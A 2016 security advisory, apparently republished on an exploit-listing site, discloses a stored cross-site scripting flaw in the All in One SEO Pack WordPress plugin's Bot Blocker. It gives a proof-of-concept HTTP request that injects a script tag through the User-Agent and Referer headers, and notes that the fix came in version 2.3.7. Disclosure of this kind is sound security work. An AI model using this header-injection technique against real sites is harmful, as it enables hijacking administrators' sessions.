WordPress All in One SEO Pack Plugin Persistent Cross-Site Scripting

2016.07.10
Credit: Pwnage
Risk: Low
Local: No
Remote: Yes
CVE: N/A
CWE: CWE-79

------------------------------------------------------------------------ Persistent Cross-Site Scripting in All in One SEO Pack WordPress Plugin ------------------------------------------------------------------------ David Vaartjes, July 2016 ------------------------------------------------------------------------ Abstract ------------------------------------------------------------------------ A stored Cross-Site Scripting vulnerability was found in the Bot Blocker functionality of the All in One SEO Pack WordPress Plugin (1+ million active installs). This issue allows an attacker to perform a wide variety of actions, such as stealing Administrators' session tokens, or performing arbitrary actions on their behalf. ------------------------------------------------------------------------ Tested versions ------------------------------------------------------------------------ This issue was successfully tested on the All in One SEO Pack WordPress Plugin version 2.3.6.1. ------------------------------------------------------------------------ Fix ------------------------------------------------------------------------ This issue has been fixed in version 2.3.7 of the plugin. Free version https://wordpress.org/plugins/all-in-one-seo-pack/ Pro version https://semperplugins.com/all-in-one-seo-pack-pro-version/ ------------------------------------------------------------------------ Details ------------------------------------------------------------------------ https://sumofpwn.nl/advisory/2016/persistent_cross_site_scripting_in_all_in_one_seo_pack_wordpress_plugin.html PoC: ------------------------------------------------------------------------ GET / HTTP/1.1 Host: 172.16.232.130 User-Agent: Abonti </pre><script>alert(1);</script> Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Referer: http://172.16.232.130/</pre><script>alert(1);</script> Connection: close Cache-Control: max-age=0 ------------------------------------------------------------------------ Admin will execute this code.

References:

https://sumofpwn.nl/advisory/2016/persistent_cross_site_scripting_in_all_in_one_seo_pack_wordpress_plugin.html


See this note in RAW Version
Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}
Copyright 2024, cxsecurity.com

 

Back to Top